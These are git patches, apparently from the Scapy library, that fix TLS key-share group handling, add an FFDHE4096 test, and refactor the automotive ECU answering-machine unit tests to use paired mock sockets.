@@ def post_dissection(self, r): for kse in self.client_shares: if kse.pubkey: pubshares = self.tls_session.tls13_client_pubshares - if _tls_named_curves[kse.group] in pubshares: + if _tls_named_groups[kse.group] in pubshares: pkt_info = r.firstlayer().summary() log_runtime.info("TLS: group %s used twice in the same ClientHello [%s]", kse.group, pkt_info) # noqa: E501 break - pubshares[_tls_named_curves[kse.group]] = kse.pubkey + pubshares[_tls_named_groups[kse.group]] = kse.pubkey return super(TLS_Ext_KeyShare_CH, self).post_dissection(r) diff --git a/test/tls.uts b/test/tls.uts index eaeb2026a09..d14371d5e55 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1532,6 +1532,25 @@ pkt = TLSServerHello(b"\x02\x00\x00\x28\x03\x03ABCDEFGHIJKLMNOPQRSTUVWXYZ012345\ assert pkt.extlen == 0 assert pkt.ext is None += Issue 3324 - FFDH support + +# Dissection + +hex_data = "16030102a8010002a4030330cc71861d50119dbe2b9c3a5207b7eff49aff19408096b32926d6fe8a4878e520c03832cba05660b5facc4b9991f3b006d326325ab1e0a9463287271952f4235f0004130200ff0100025700000020001e00001b6578616d706c653132333435362e6d79636f6d70616e792e636f6d000a000400020102002300000016000000170000000d000400020403002b0003020304002d00020101003302060204010202003476f00e12d8c768be0bd6db6af9e539441edd84b87178e8843bb2febc4b2097ac9619e65ed61837550e51834c32c7cb007b9b9a2f129d7127ee9f8bcbc2ba2141677300bc660d080d32257731d8d795bda7467df240cf07e8f1cde33bfc1f168385babee0f5834269f3c1070f7d89b3b9607b474edd306af54638d14e58cdc524b8972035a762dc446ef95b30a8c5e06876804ec9fb180f0255ea93b1438336e414761e1e1e2772909ce3fadc5282674337267f9697204b81a0b3ded2a3ecb03b46c1a4113e44b23a67d349b0406903b6acfdce0595e16b4f41dee9351f16e1267f9bdc6abbd897332552cb9b139f1556fc207fb8dee337d185acbe6b1b42c09751339e7d441933bec3cc4b24740b1640a2af73eadf700e0bee5065c38886f6a5983e1029f67085590f95f9546057725c004804cd97ed2c1c5ca0383751e77c087449719e65d9a39adad84e1bab92c0f9b7b472e58f60d4f81e3b622d7f62fd61c747e5951b54e9ef7b1a65b07e25c94baa7c19284ecf855a5cff7dae958359f3bd5d6184f11a3785026f8479d25595948160de89e8af62f306783c79b0bf28fb18da512737b52ede9f826ed95ed1ce8386e3ff3e74ba0b7ad82bef0c046223986475de12c9654f0fc3cb162d24ab02fe51120566bc993583e10149c16d953640357785e88748739cf84a3f0930fe5b4732f17f32e7e7fdf00023643a798cf7" + +key = "3476f00e12d8c768be0bd6db6af9e539441edd84b87178e8843bb2febc4b2097ac9619e65ed61837550e51834c32c7cb007b9b9a2f129d7127ee9f8bcbc2ba2141677300bc660d080d32257731d8d795bda7467df240cf07e8f1cde33bfc1f168385babee0f5834269f3c1070f7d89b3b9607b474edd306af54638d14e58cdc524b8972035a762dc446ef95b30a8c5e06876804ec9fb180f0255ea93b1438336e414761e1e1e2772909ce3fadc5282674337267f9697204b81a0b3ded2a3ecb03b46c1a4113e44b23a67d349b0406903b6acfdce0595e16b4f41dee9351f16e1267f9bdc6abbd897332552cb9b139f1556fc207fb8dee337d185acbe6b1b42c09751339e7d441933bec3cc4b24740b1640a2af73eadf700e0bee5065c38886f6a5983e1029f67085590f95f9546057725c004804cd97ed2c1c5ca0383751e77c087449719e65d9a39adad84e1bab92c0f9b7b472e58f60d4f81e3b622d7f62fd61c747e5951b54e9ef7b1a65b07e25c94baa7c19284ecf855a5cff7dae958359f3bd5d6184f11a3785026f8479d25595948160de89e8af62f306783c79b0bf28fb18da512737b52ede9f826ed95ed1ce8386e3ff3e74ba0b7ad82bef0c046223986475de12c9654f0fc3cb162d24ab02fe51120566bc993583e10149c16d953640357785e88748739cf84a3f0930fe5b4732f17f32e7e7fdf00023643a798cf7" + +tls_packet = TLS(hex_bytes(hex_data)) +assert tls_packet.msg[0].ext[8].client_shares[0].sprintf("%group%") == 'ffdhe4096' +assert tls_packet.msg[0].ext[8].client_shares[0].key_exchange == hex_bytes(key) +assert tls_packet.tls_session.tls13_client_pubshares['ffdhe4096'].key_size == 4096 + +# Build + +tls_packet = TLS(msg=[TLSClientHello(ext=[TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group="ffdhe4096")])])]) +tls_packet.raw_stateful() +assert tls_packet.tls_session.tls13_client_privshares['ffdhe4096'].key_size == 4096 + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### From 05036527bf0ccb5f4da18fe5791fbfca22695183 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 30 Aug 2021 13:30:29 +0200 Subject: [PATCH 0642/1632] Cleanup unit test for EcuAnswerwingMachine --- test/contrib/automotive/ecu_am.uts | 490 +++++++++----------- test/contrib/automotive/interface_mockup.py | 22 +- 2 files changed, 240 insertions(+), 272 deletions(-) diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 6820f4b8aae..86d5b10e806 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,5 +1,4 @@ % Regression tests for EcuAnsweringMachine -~ not_pypy automotive_comm + Configuration ~ conf @@ -19,47 +18,46 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) -print("Set delay to lower utilization") -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 +from scapy.contrib.automotive.uds_ecu_states import * + +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 + +ecu = TestSocket(UDS) +tester = TestSocket(UDS) +ecu.pair(tester) + Simulator tests = Simple check with RDBI and Negative Response -drain_bus(iface0) example_responses = \ [EcuResponse([EcuState(session=1)], responses=UDS() / UDS_RDBIPR(dataIdentifier=0x1234) / Raw(b"deadbeef"))] success = False - -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS, verbose=False) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[0x123]), timeout=1, verbose=False) - assert resp.negativeResponseCode == 0x10 - assert resp.requestServiceId == 34 - resp = tester.sr1(UDS(service=0x22), timeout=1, verbose=False) - assert resp.negativeResponseCode == 0x10 - assert resp.requestServiceId == 34 - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[0x1234]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 0x1234 - assert resp.load == b"deadbeef" - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS, verbose=False) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[0x123]), timeout=1, verbose=False) + assert resp.negativeResponseCode == 0x10 + assert resp.requestServiceId == 34 + resp = tester.sr1(UDS(service=0x22), timeout=1, verbose=False) + assert resp.negativeResponseCode == 0x10 + assert resp.requestServiceId == 34 + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[0x1234]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 0x1234 + assert resp.load == b"deadbeef" + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with different Sessions -drain_bus(iface0) example_responses = \ [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), @@ -69,47 +67,43 @@ example_responses = \ success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.negativeResponseCode == 0x10 - assert resp.requestServiceId == 34 - answering_machine.state.session = 2 - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 2 - assert resp.load == b"deadbeef1" - answering_machine.state.session = 4 - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 3 - assert resp.load == b"deadbeef2" - answering_machine.state.session = 6 - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 5 - assert resp.load == b"deadbeef3" - answering_machine.state.session = 9 - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 9 - assert resp.load == b"deadbeef4" - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.negativeResponseCode == 0x10 + assert resp.requestServiceId == 34 + answering_machine.state.session = 2 + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 2 + assert resp.load == b"deadbeef1" + answering_machine.state.session = 4 + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 3 + assert resp.load == b"deadbeef2" + answering_machine.state.session = 6 + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 5 + assert resp.load == b"deadbeef3" + answering_machine.state.session = 9 + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 9 + assert resp.load == b"deadbeef4" + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with different Sessions and diagnosticSessionControl -drain_bus(iface0) example_responses = \ [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), @@ -130,63 +124,59 @@ example_responses = \ success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.negativeResponseCode == 0x10 - assert resp.requestServiceId == 34 - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=2), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 2 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 2 - assert resp.load == b"deadbeef1" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=4), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 4 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 3 - assert resp.load == b"deadbeef2" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=6), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 6 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 5 - assert resp.load == b"deadbeef3" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=8), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 8 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_DSC(diagnosticSessionType=9), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 9 - assert resp.sessionParameterRecord == b"dead1" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 9 - assert resp.load == b"deadbeef4" - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.negativeResponseCode == 0x10 + assert resp.requestServiceId == 34 + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=2), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 2 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 2 + assert resp.load == b"deadbeef1" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=4), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 4 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 3 + assert resp.load == b"deadbeef2" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=6), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 6 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 5 + assert resp.load == b"deadbeef3" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=8), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 8 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_DSC(diagnosticSessionType=9), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 9 + assert resp.sessionParameterRecord == b"dead1" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 9 + assert resp.load == b"deadbeef4" + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with different Sessions and diagnosticSessionControl and answers hook -drain_bus(iface0) def custom_answers(resp, req): if req.service + 0x40 != resp.service: @@ -209,64 +199,59 @@ example_responses = \ success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, - main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.negativeResponseCode == 0x10 - assert resp.requestServiceId == 34 - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=2), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 2 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 2 - assert resp.load == b"deadbeef1" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=4), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 4 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 3 - assert resp.load == b"deadbeef2" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=6), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 6 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 5 - assert resp.load == b"deadbeef3" - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=8), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 8 - assert resp.sessionParameterRecord == b"dead" - resp = tester.sr1(UDS() / UDS_DSC(diagnosticSessionType=9), timeout=1, verbose=False) - assert resp.service == 0x50 - assert resp.diagnosticSessionType == 9 - assert resp.sessionParameterRecord == b"dead1" - resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) - assert resp.service == 0x62 - assert resp.dataIdentifier == 9 - assert resp.load == b"deadbeef4" - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 60, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.negativeResponseCode == 0x10 + assert resp.requestServiceId == 34 + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=2), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 2 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 2 + assert resp.load == b"deadbeef1" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=4), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 4 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 3 + assert resp.load == b"deadbeef2" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=6), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 6 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 5 + assert resp.load == b"deadbeef3" + resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=8), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 8 + assert resp.sessionParameterRecord == b"dead" + resp = tester.sr1(UDS() / UDS_DSC(diagnosticSessionType=9), timeout=1, verbose=False) + assert resp.service == 0x50 + assert resp.diagnosticSessionType == 9 + assert resp.sessionParameterRecord == b"dead1" + resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) + assert resp.service == 0x62 + assert resp.dataIdentifier == 9 + assert resp.load == b"deadbeef4" + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with security access and answers hook -drain_bus(iface0) security_seed = b"abcd" @@ -289,36 +274,31 @@ example_responses = \ success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, - main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=1, verbose=False) - assert resp.service == 0x7f - assert resp.negativeResponseCode == 0x35 - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=1, verbose=False) - assert resp.service == 0x67 - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=1, verbose=False) + assert resp.service == 0x7f + assert resp.negativeResponseCode == 0x35 + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=1, verbose=False) + assert resp.service == 0x67 + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with security access and answers hook and request-correctly-received message -drain_bus(iface0) security_seed = b"abcd" @@ -341,36 +321,31 @@ example_responses = \ success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, - main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=2, verbose=False) - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=2, verbose=False) - assert resp.service == 0x7f - assert resp.negativeResponseCode == 0x35 - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=2, verbose=False) - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=2, verbose=False) - assert resp.service == 0x67 - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout': 10, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=2, verbose=False) + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=2, verbose=False) + assert resp.service == 0x7f + assert resp.negativeResponseCode == 0x35 + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=2, verbose=False) + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=2, verbose=False) + assert resp.service == 0x67 + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success = Simple check with security access and answers hook and request-correctly-received message 2 -drain_bus(iface0) security_seed = b"abcd" @@ -395,44 +370,35 @@ conf.contribs['UDS']['treat-response-pending-as-answer'] = True success = False -with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, basecls=UDS) as ecu, \ - new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x600, did=0x700, basecls=UDS) as tester: - answering_machine = EcuAnsweringMachine(supported_responses=example_responses, - main_socket=ecu, basecls=UDS) - sim = threading.Thread(target=answering_machine, kwargs={'timeout':5, 'stop_filter': lambda p: p.service==0xff}) - sim.start() - time.sleep(0.1) - try: - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) - assert resp.service == 0x7f - assert resp.negativeResponseCode == 0x78 - resp = tester.sniff(timeout=2, count=1, verbose=False)[0] - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=3, verbose=False) - assert resp.service == 0x7f - assert resp.negativeResponseCode == 0x35 - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) - assert resp.service == 0x7f - assert resp.negativeResponseCode == 0x78 - resp = tester.sniff(timeout=2, count=1, verbose=False)[0] - assert resp.service == 0x67 - assert resp.securitySeed == b"abcd" - resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=1, verbose=False) - assert resp.service == 0x67 - success = True - except Exception as ex: - print(ex) - finally: - tester.send(UDS(service=0xff)) - sim.join(timeout=10) +answering_machine = EcuAnsweringMachine(supported_responses=example_responses, + main_socket=ecu, basecls=UDS) +sim = threading.Thread(target=answering_machine, kwargs={'timeout':5, 'stop_filter': lambda p: p.service==0xff}) +sim.start() +try: + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) + assert resp.service == 0x7f + assert resp.negativeResponseCode == 0x78 + resp = tester.sniff(timeout=2, count=1, verbose=False)[0] + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed), timeout=3, verbose=False) + assert resp.service == 0x7f + assert resp.negativeResponseCode == 0x35 + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=1), timeout=1, verbose=False) + assert resp.service == 0x7f + assert resp.negativeResponseCode == 0x78 + resp = tester.sniff(timeout=2, count=1, verbose=False)[0] + assert resp.service == 0x67 + assert resp.securitySeed == b"abcd" + resp = tester.sr1(UDS() / UDS_SA(securityAccessType=2, securityKey=resp.securitySeed+resp.securitySeed), timeout=1, verbose=False) + assert resp.service == 0x67 + success = True +except Exception as ex: + print(ex) +finally: + tester.send(UDS(service=0xff)) + sim.join(timeout=10) assert success conf.contribs['UDS']['treat-response-pending-as-answer'] = False - -+ Cleanup - -= Delete vcan interfaces - -assert cleanup_interfaces() diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index ad95ec513e6..d5bb8dd7a31 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -234,7 +234,7 @@ def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None super(TestSocket, self).__init__() self.basecls = basecls - self.__paired_socket = None # type: Optional[TestSocket] + self.paired_sockets = list() # type: List[TestSocket] self.closed = False def close(self): @@ -243,19 +243,14 @@ def close(self): def pair(self, sock): # type: (TestSocket) -> None - if sock.__paired_socket or self.__paired_socket: - raise Scapy_Exception("Socket already paired") - self.__paired_socket = sock - sock.__paired_socket = self + self.paired_sockets += [sock] + sock.paired_sockets += [self] def send(self, x): # type: (Packet) -> int - if not self.__paired_socket: - self.close() - raise Scapy_Exception("Socket not paired!") - sx = bytes(x) - 